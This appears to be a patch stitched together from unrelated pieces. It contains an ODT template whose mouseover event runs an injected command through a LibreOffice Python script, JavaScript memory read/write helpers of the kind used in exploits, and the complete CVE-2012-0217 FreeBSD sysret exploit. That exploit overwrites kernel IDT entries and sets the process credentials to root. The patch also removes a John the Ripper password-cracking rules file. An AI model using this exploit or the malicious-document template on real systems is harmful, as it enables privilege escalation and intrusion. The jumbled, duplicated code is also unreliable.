xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -79,6 +79,18 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.

@@ -46,6 +46,139 @@ function hexdump(data) {
    return lines.join('\n');
 }

+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function b2u32(b)
+{
+    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+}
+
+
+
+function off2addr(segs, off)
+{
+    if(!(off instanceof Int64)) off = new Int64(off);
+    for(var i = 0; i < segs.length; ++i)
+    {
+        var start = segs[i].fileoff;
+        var end   = Add(start, segs[i].size);
+        if
+        (
+            (start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
+            (end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
+        )
+        {
+            return Add(segs[i].addr, Sub(off, start));
+        }
+    }
+    return new Int64("0x4141414141414141");
+}
+
+function fsyms(mem, base, segs, want, syms)
+{
+    want = Array.from(want); // copy
+    if(syms === undefined)
+    {
+        syms = {};
+    }
+
+    var stab = null;
+    var ncmds = mem.u32(Add(base, 0x10));
+    for(var i = 0, off = 0x20; i < ncmds; ++i)
+    {
+        var cmd = mem.u32(Add(base, off));
+        if(cmd == 0x2) // LC_SYMTAB
+        {
+            var b = mem.read(Add(base, off + 0x8), 0x10);
+            stab =
+            {
+                symoff:  b2u32(b.slice(0x0, 0x4)),
+                nsyms:   b2u32(b.slice(0x4, 0x8)),
+                stroff:  b2u32(b.slice(0x8, 0xc)),
+                strsize: b2u32(b.slice(0xc, 0x10)),
+            };
+            break;
+        }
+        off += mem.u32(Add(base, off + 0x4));
+    }
+    if(stab == null)
+    {
+        fail("stab");
+    }
+    var tmp = { base: off2addr(segs, stab.stroff), off: 0 };
+    var fn = function(i)
+    {
+        return mem.read(Add(tmp.base, tmp.off + i), 1)[0];
+    };
+    for(var i = 0; i < stab.nsyms && want.length > 0; ++i)
+    {
+        tmp.off = mem.u32(off2addr(segs, stab.symoff + i * 0x10));
+        for(var j = 0; j < want.length; ++j)
+        {
+            var s = want[j];
+            if((strcmp(fn, s)))
+            {
+                syms[s] = mem.readInt64(off2addr(segs, stab.symoff + i * 0x10 + 0x8));
+                want.splice(j, 1);
+                break;
+            }
+        }
+    }
+    return syms;
+}
+
+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function _u32(i)
+{
+    return b2u32(this.read(i, 4));
+}
+
+function _read(i, l)
+{
+    if (i instanceof Int64) i = i.lo();
+    if (l instanceof Int64) l = l.lo();
+    if (i + l > this.length)
+    {
+        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
+    }
+    return this.slice(i, i + l);
+}
+
+function _readInt64(addr)
+{
+    return new Int64(this.read(addr, 8));
+}
+
+function _writeInt64(i, val)
+{
+    if (i instanceof Int64) i = i.lo();
+    this.set(val.bytes(), i);
+}
+
+
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -1,2022 +0,0 @@
-#
-# This file is part of John the Ripper password cracker,
-# Copyright (c) 1996-2006,2008-2011 by Solar Designer
-#
-# ...with changes in the jumbo patch, by various authors
-#
-
-#
-# This file uses rules from the KoreLogic set published
-# online at: http://contest.korelogic.com/rules.html
-#
-
-[Options]
-# Wordlist file name, to be used in batch mode
-Wordlist = $JOHN/password.lst
-# Default Markov mode settings
-Statsfile = $JOHN/stats
-MkvLvl = 200
-MkvMaxLen = 12
-# Use idle cycles only
-Idle = Y
-# Crash recovery file saving delay in seconds
-Save = 600
-# Beep when a password is found (who needs this anyway?)
-Beep = N
-
-# Automagically disable OMP if MPI is used (set to N if
-# you want to run one MPI process per multi-core host)
-MPIOMPmutex = Y
-
-# Print a notice if disabling OMP (when MPIOMPmutex = Y)
-# or when running OMP and MPI at the same time
-MPIOMPverbose = Y
-
-# Time formatting string used in status ETA.
-# %c  means 'local' specific canonical form, such as:
-# 05/06/11 18:10:34
-#
-# Other examples
-# %d/%m/%y %H:%M   (day/mon/year hour:min)
-# %m/%d/%y %H:%M   (mon/day/year hour:min)
-# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
-TimeFormat = %c
-
-# Threshold for showing ETA, in percent. ETA will not be
-# shown if progress is less than this. If too low, early
-# reported figures will be less accurate (default 0.05%)
-ETAthreshold = 0.05%
-
-# "Single crack" mode rules
-[List.Rules:Single]
-# Simple rules come first...
-:
-s x**
-c (?a c Q
-c l Q
-s-c x** /?u l
-# These were not included in crackers I've seen, but are pretty efficient,
-# so I include them near the beginning
->6 '6
->7 '7 l
-c >6 '6 /?u l
->5 '5
-# Weird order, eh? Can't do anything about it, the order is based on the
-# number of successful cracks...
-<* d
-r c
-c <* (?a d c
-c >5 '5 /?u l
-c u Q
-c )?a r l
-[:c] <* !?A \p1[lc] p
-c <* c Q d
-c >7 '7 /?u
->4 '4 l
-c <+ (?l c r
-c <+ )?l l Tm
->3 '3
-c >4 '4 /?u
-c >3 '3 /?u l
-c u Q r
-<* d M 'l f Q
-c <* l Q d M 'l f Q
-# About 50% of single-mode-crackable passwords get cracked by now...
-# >2 x12 ... >8 x18
->[2-8] x1\1
->9 \[
-# >3 x22 ... >9 x28
->[3-9] x2\p[2-8]
-# >4 x32 ... >9 x37
->[4-9] x3\p[2-7]
-# >2 x12 /?u l ... >8 x18 /?u l
-c >[2-8] x1\1 /?u l
-c >9 \[ /?u l
-# >3 x22 /?u l ... >9 x28 /?u l
-c >[3-9] x2\p[2-8] /?u l
-# >4 x32 /?u l ... >9 x37 /?u l
-c >[4-9] x3\p[2-7] /?u l
-# Now to the suffix stuff...
-<* l $[1-9!0a-rt-z"-/:-@\[-`{-~]
-c <* (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
-[:c] <* !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
-[:c] <* /?A (?\p1[za] \p1[lc] $s
-<* l r $[1-9!]
-c <* /?a u $[1-9!]
-[:c] <- (?\p1[za] \p1[lc] Az"'s"
-[:c] <- (?\p1[za] \p1[lc] Az"!!"
-[:c] (?\p1[za] \p1[lc] $! <- Az"!!"
-# Removing vowels...
-[:c] /?v @?v >2 (?\p1[za] \p1[lc]
-/?v @?v >2 <* d
-# crack -> cracked, crack -> cracking
-<* l [PI]
-c <* l [PI] (?a c
-# mary -> marie
-[:c] <* (?\p1[za] \p1[lc] )y omi $e
-# marie -> mary
-[:c] <* (?\p1[za] \p1[lc] )e \] )i val1 oay
-# The following are some 3l33t rules
-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-# Now to the prefix stuff...
-l ^[1a-z2-90]
-c l Q ^[A-Z]
-^[A-Z]
-l ^["-/:-@\[-`{-~]
-[:c] <9 (?a \p1[lc] A0"[tT]he"
-[:c] <9 (?a \p1[lc] A0"[aA]my"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
-[:c] <9 (?a \p1[lc] A0"__"
-<- !?A l p ^[240-9]
-# Some word pair rules...
-# johnsmith -> JohnSmith, johnSmith
-p-c (?a 2 (?a c 1 [cl]
-# JohnSmith -> john smith, john_smith, john-smith
-p 1 <- $[ _\-] + l
-# JohnSmith -> John smith, John_smith, John-smith
-p-c 1 <- (?a c $[ _\-] 2 l
-# JohnSmith -> john Smith, john_Smith, john-Smith
-p-c 1 <- l $[ _\-] 2 (?a c
-# johnsmith -> John Smith, John_Smith, John-Smith
-p-c 1 <- (?a c $[ _\-] 2 (?a c
-# Applying different simple rules to each of the two words
-p-[c:] 1 \p1[ur] 2 l
-p-c 2 (?a c 1 [ur]
-p-[c:] 1 l 2 \p1[ur]
-p-c 1 (?a c 2 [ur]
-# jsmith -> smithj, etc...
-[:c] (?a \p1[lc] [{}]
-[:c] (?a \p1[lc] [{}] \0
-# Toggle case...
-c <+ )?u l Tm
-c T0 Q M c Q l Q u Q C Q X0z0 'l
-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
-# Deleting chars...
->[2-8] D\p[1-7]
->[8-9A-E] D\1
-c /?u >[2-8] D\p[1-7] l
-c /?u >[8-9A-E] D\1 l
-=1?a \[ M c Q
-c (?a >[1-9A-E] D\1 c
-# Inserting a dot...
-[:c] >3 (?a \p1[lc] i[12].
-# More suffix stuff...
-<- l Az"[190][0-9]"
-c <- (?a c Az"[190][0-9]"
-<- l Az"[782][0-9]"
-c <- (?a c Az"[782][0-9]"
-<* l $[A-Z]
-c <* (?a c $[A-Z]
-# cracking -> CRACKiNG
-c u /I sIi
-# Crack96 -> cRACK96
-%2?a C Q
-# Crack96 -> cRACK(^
-/?A S Q
-# Crack96 -> CRaCK96
-c /?v V Q
-# Really weird charset conversions, like "england" -> "rmh;smf"
-:[RL] Q
-l Q [RL]
-c (?a c Q [RL]
-:[RL] \0 Q
-# Both prefixing and suffixing...
-<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
-<- l ^[({[<] $\p[)}\]>]
-# The rest of two-digit suffix stuff, less common numbers...
-<- l Az"[63-5][0-9]"
-c <- (?a c Az"[63-5][0-9]"
-# Some three-digit numbers...
-[:c] (?a \p1[lc] Az"007" <+
-[:c] (?a \p1[lc] Az"123" <+
-[:c] (?a \p1[lc] Az"[1-9]\0\0" <+
-# Some [birth] years...
-l Az"19[7-96-0]" <+ >-
-l Az"20[01]" <+ >-
-l Az"19[7-9][0-9]" <+
-l Az"20[01][0-9]" <+
-l Az"19[6-0][9-0]" <+
-# Uncomment the following lines if you're really crazy
-;# Insert/overstrike some characters...
-;!?A >[1-6] l i\0[a-z]
-;!?A l o0[a-z]
-;!?A >[1-7] l o\0[a-z]
-;# Toggle case everywhere (up to length 8), assuming that certain case
-;# combinations were already tried.
-;-c T1 Q M T0 Q
-;-c T2 Q M T[z0] T[z1] Q
-;-c T3 Q M T[z0] T[z1] T[z2] Q
-;-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-;-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-;-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-;-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-;# Very slow stuff...
-;l Az"[1-90][0-9][0-9]" <+
